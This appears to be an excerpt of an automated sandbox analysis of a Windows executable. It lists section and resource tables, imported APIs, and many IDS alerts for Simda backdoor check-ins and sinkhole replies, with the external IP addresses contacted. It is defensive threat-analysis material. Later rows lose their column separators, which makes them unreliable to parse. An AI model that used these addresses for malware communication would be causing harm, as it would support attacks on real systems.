.data | 0x24000 | 0x36c0 | 0x3800 | 9a257e09d714d8ab48b690e8453afbd6 | False | 0.81298828125 | data | 6.7672572781458635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.s | 0x28000 | 0x65bb | 0x800 | 30f797c52e34fe45fded3dfd0de177a6 | False | 0.2587890625 | data | 2.075341234110115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.w | 0x2f000 | 0x2fd0b | 0x800 | 1958d4f52ae8d506c6908df58c4a3a64 | False | 0.6533203125 | data | 5.386043783353626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5f000 | 0x29434 | 0x29600 | 496540dfc12657aab2ce18ca319f7ae5 | False | 0.9770404550604229 | data | 7.967828924738939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x89000 | 0x3fe | 0x400 | a91b09921b19daa6e0bdbe6b0aaccf90 | False | 0.939453125 | data | 6.753512294366748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x5f310 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4143996247654784
RT_DIALOG | 0x603b8 | 0x50 | data | English | United States | 1.0
RT_STRING | 0x60408 | 0x11a | data | English | United States | 0.7304964539007093
RT_STRING | 0x60524 | 0x114 | data | English | United States | 0.7282608695652174
RT_STRING | 0x60638 | 0x10c | data | English | United States | 0.7388059701492538
RT_STRING | 0x60744 | 0x154 | data | English | United States | 0.6970588235294117
RT_STRING | 0x60898 | 0x11a | Targa image data - Color 2 x 55 x 32 +42 +86 "\011" | English | United States | 0.7269503546099291
RT_STRING | 0x609b4 | 0x16e | data | English | United States | 0.6857923497267759
RT_STRING | 0x60b24 | 0x132 | data | English | United States | 0.7124183006535948
RT_STRING | 0x60c58 | 0xfe | data | English | United States | 0.7480314960629921
RT_RCDATA | 0x60d58 | 0x27493 | data | English | United States | 1.0003480098188484
RT_GROUP_ICON | 0x881ec | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x88200 | 0x234 | data | English | United States | 0.5336879432624113
DLL | Import
kernel32.dll | SetLocaleInfoA, lstrcpyn, CreateNamedPipeA, GetEnvironmentVariableA, GetExitCodeThread, OpenEventW, GetLogicalDriveStringsA, CopyFileExW, SetPriorityClass, GetProcAddress, CreateMutexA, CreateMutexW, QueryPerformanceCounter, CreateThread, SetUnhandledExceptionFilter, OpenMutexW, GetExitCodeProcess, GlobalGetAtomNameA, GetFileTime, GetCalendarInfoA, MulDiv, CreateFileMappingW, CreateMailslotA, FreeResource, LocalFree, DeleteAtom, GetVolumeInformationA, RaiseException, AddAtomA, GlobalFindAtomW, RemoveDirectoryW, GlobalFindAtomA, CreateMailslotW, GetProcessHeaps, EndUpdateResourceA, CopyFileExA, CreateNamedPipeW, SleepEx, GetModuleHandleA, WaitForSingleObject, GetSystemDefaultLangID, SetEvent, TlsAlloc, SetCalendarInfoW, GetLastError, GetFileSize, lstrlen, DuplicateHandle, GetAtomNameW, GetStringTypeW, CreateFileA
USER32.DLL | CheckMenuItem, GetDC, DefDlgProcW, BringWindowToTop, GetDlgItem, EnumWindows, PeekMessageW, SetCursor, GetWindowLongA, MessageBoxIndirectW, CreatePopupMenu, keybd_event, GetWindowTextLengthA
gdi32.dll | CreateFontIndirectExA, CreatePolygonRgn, CreateDIBitmap, GetLogColorSpaceW, SetGraphicsMode, GdiGetBatchLimit, ScaleWindowExtEx, SelectObject, GetEnhMetaFileHeader, GetFontData, SetLayout, SetRectRgn, ExtSelectClipRgn, EnumFontFamiliesA, GetAspectRatioFilterEx, GetNearestPaletteIndex, PolylineTo, PatBlt, SelectClipRgn
ADVAPI32.DLL | RegEnumValueW, RegReplaceKeyA, RegCreateKeyW, RegQueryValueA, RegCreateKeyExA, RegReplaceKeyW, RegCloseKey
SHLWAPI.DLL | PathGetArgsW, ChrCmpIA, StrSpnW, PathAddBackslashW, PathIsUNCA, SHRegOpenUSKeyW, PathIsPrefixA, PathCompactPathExA
COMCTL32.DLL | FlatSB_SetScrollRange, InitCommonControls
winspool.drv | AddFormW, EnumMonitorsW, OpenPrinterW, GetJobW, DeleteMonitorA, EndDocPrinter, AddPrinterConnectionW, SetPrinterDataExW
INETCOMM.DLL | MimeOleParseRfc822Address, MimeOleParseRfc822AddressW, HrGetAttachIcon, EssSecurityLabelEncodeEx, MimeOleGetDefaultCharset, MimeOleGetFileExtension, HrAttachDataFromFile, EssKeyExchPreferenceEncodeEx, EssSignCertificateDecodeEx, MimeOleSMimeCapGetHashAlg, EssKeyExchPreferenceDecodeEx, MimeOleGetCharsetInfo, MimeOleGetCertsFromThumbprints
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T18:50:20.242899+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 52127 | 178.162.203.226 | 80 | TCP
2024-11-11T18:50:28.382178+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49714 | 18.208.156.248 | 80 | TCP
2024-11-11T18:50:28.384108+0100 | 2021022 | ET MALWARE Wapack Labs Sinkhole DNS Reply | 1 | 1.1.1.1 | 53 | 192.168.2.6 | 63778 | UDP
2024-11-11T18:50:28.388425+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.6 | 49714 | TCP
2024-11-11T18:50:28.388425+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.6 | 49714 | TCP
2024-11-11T18:50:28.394575+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49715 | 3.94.10.34 | 80 | TCP
2024-11-11T18:50:28.400852+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.6 | 49715 | TCP
2024-11-11T18:50:28.400852+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.6 | 49715 | TCP
2024-11-11T18:50:28.853586+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49717 | 23.253.46.64 | 80 | TCP
2024-11-11T18:50:28.967187+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49721 | 75.2.71.199 | 80 | TCP
2024-11-11T18:50:28.995545+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49719 | 44.221.84.105 | 80 | TCP
2024-11-11T18:50:29.049618+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49720 | 44.221.84.105 | 80 | TCP
2024-11-11T18:50:29.056090+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.6 | 49720 | TCP
2024-11-11T18:50:29.056090+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.6 | 49720 | TCP
2024-11-11T18:50:29.129713+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49722 | 208.100.26.245 | 80 | TCP
2024-11-11T18:50:29.132050+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49718 | 188.114.96.3 | 80 | TCP
2024-11-11T18:50:29.132181+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49723 | 199.59.243.227 | 80 | TCP
2024-11-11T18:50:29.316635+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49725 | 85.17.31.122 | 80 | TCP
2024-11-11T18:50:29.332735+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49726 | 75.2.71.199 | 80 | TCP
2024-11-11T18:50:29.336475+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49724 | 23.253.46.64 | 80 | TCP
2024-11-11T18:50:29.938801+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49722 | 208.100.26.245 | 80 | TCP
2024-11-11T18:50:30.305367+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49716 | 199.191.50.83 | 80 | TCP
2024-11-11T18:50:30.453744+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49729 | 85.17.31.122 | 80 | TCP
2024-11-11T18:50:30.765094+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49728 | 154.212.231.82 | 80 | TCP
2024-11-11T18:50:31.135319+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49728 | 154.212.231.82 | 80 | TCP
2024-11-11T18:50:31.277356+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49730 | 188.114.96.3 | 443 | TCP
2024-11-11T18:50:31.640900+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49718 | 188.114.96.3 | 80 | TCP
2024-11-11T18:50:32.163788+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49716 | 199.191.50.83 | 80 | TCP
2024-11-11T18:50:32.974570+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49732 | 188.114.96.3 | 443 | TCP
2024-11-11T18:50:33.801283+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49739 | 13.248.169.48 | 80 | TCP
2024-11-11T18:50:34.292654+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49745 | 18.208.156.248 | 80 | TCP
2024-11-11T18:50:34.316861+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49746 | 3.94.10.34 | 80 | TCP
2024-11-11T18:50:34.461380+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49740 | 188.114.97.3 | 80 | TCP
2024-11-11T18:50:35.422578+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49753 | 103.150.10.48 | 80 | TCP
2024-11-11T18:50:36.286835+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49748 | 188.114.97.3 | 443 | TCP
2024-11-11T18:50:36.525173+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49753 | 103.150.10.48 | 80 | TCP
2024-11-11T18:50:36.618406+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49740 | 188.114.97.3 | 80 | TCP
2024-11-11T18:50:38.639221+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49770 | 188.114.97.3 | 443 | TCP
2024-11-11T18:50:39.231729+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49787 | 76.223.67.189 | 80 | TCP
2024-11-11T18:50:39.333074+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49786 | 64.225.91.73 | 80 | TCP
2024-11-11T18:50:39.459120+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49793 | 44.221.84.105 | 80 | TCP
2024-11-11T18:50:39.661493+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49794 | 103.224.212.210 | 80 | TCP
2024-11-11T18:50:39.707541+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49795 | 103.224.182.252 | 80 | TCP
2024-11-11T18:50:40.071995+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49796 | 154.85.183.50 | 80 | TCP
2024-11-11T18:50:40.396288+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49796 | 154.85.183.50 | 80 | TCP
2024-11-11T18:50:41.413497+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.6 | 49809 | TCP
2024-11-11T18:50:42.059796+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49821 | 64.225.91.73 | 80 | TCP
2024-11-11T18:50:42.207628+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49822 | 72.52.179.174 | 80 | TCP
2024-11-11T18:50:42.710031+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 49829 | 72.52.179.174 | 80 | TCP
2024-11-11T18:50:45.503052+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.6 | 53361 | 52.34.198.229 | 80 | TCP
2024-11-11T18:50:45.509709+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 52.34.198.229 | 80 | 192.168.2.6 | 53361 | TCP
                                                                                                                                                                                                                  2024-11-11T18:50:45.509709+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.653361TCP
                                                                                                                                                                                                                  2024-11-11T18:50:47.379554+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65337744.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.461931+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.644765+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.665125+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.686836+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649722208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.810984+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653397199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.819147+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464385.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.827041+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464223.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:48.845213+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464475.2.71.19980TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.127177+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649728154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.343575+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464823.253.46.6480TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.581438+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464775.2.71.199443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.656007+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649716199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.693241+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65464685.17.31.12280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:49.946205+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654645188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:50.392760+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649718188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:51.677988+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654664188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:52.549462+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:52.661556+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:53.193925+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649753103.150.10.4880TCP
                                                                                                                                                                                                                  2024-11-11T18:50:54.724755+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654680188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:55.237760+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649740188.114.97.380TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.118452+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654701188.114.97.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.559668+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.867087+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654724103.224.212.21080TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.868021+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.654725103.224.182.25280TCP
                                                                                                                                                                                                                  2024-11-11T18:50:58.874229+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.649796154.85.183.5080TCP
                                                                                                                                                                                                                  2024-11-11T18:51:01.715916+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65376472.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.022620+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.658475UDP
                                                                                                                                                                                                                  2024-11-11T18:51:02.257245+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65376672.52.179.17480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.644676+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65377399.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.653221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65377444.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.687438+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653772162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.851434+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653777199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:02.871820+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653776208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.077021+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6521193.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.122626+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652122199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.122914+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65212144.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.129382+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652123208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.131696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652125178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.215055+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652124162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.250811+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65212918.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.387344+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652126188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.476165+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652133199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:03.512905+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652128188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.390728+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65214544.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.395317+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65214644.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.472086+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6521473.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.478958+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65215044.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:05.495054+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652149208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.013364+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652149208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.359590+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652163178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:08.770082+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65217299.83.170.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.031576+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65217091.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.288928+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.653776208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.495150+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021844.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.580373+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650219178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.643025+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021099.83.170.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.747199+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65021691.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.868031+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652171188.114.96.3443TCP
                                                                                                                                                                                                                  2024-11-11T18:51:09.951696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650215154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:10.410076+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652164199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:10.742762+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652123208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.007062+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.652128188.114.96.380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.028634+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65022618.208.156.24880TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.169370+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650217199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:11.524536+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650227154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:12.223562+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650234208.100.26.24580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:12.471105+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650228199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.389967+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6502353.94.10.3480TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.582954+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650236199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.851378+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65023944.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.909835+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65024244.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:13.940191+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650244178.162.203.22680TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.030524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650243162.255.119.10280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.291524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650238154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:14.965158+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65024691.195.240.1980TCP
                                                                                                                                                                                                                  2024-11-11T18:51:15.357751+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.650241199.191.50.8380TCP
                                                                                                                                                                                                                  2024-11-11T18:51:17.440468+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659192154.212.231.8280TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.730439+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.659197199.59.243.22780TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.731431+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65919844.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.732974+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.65919544.221.84.10580TCP
                                                                                                                                                                                                                  2024-11-11T18:51:19.733944+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.6591993.94.10.3480TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.129251003 CET8049722208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.129713058 CET4972280192.168.2.6208.100.26.245
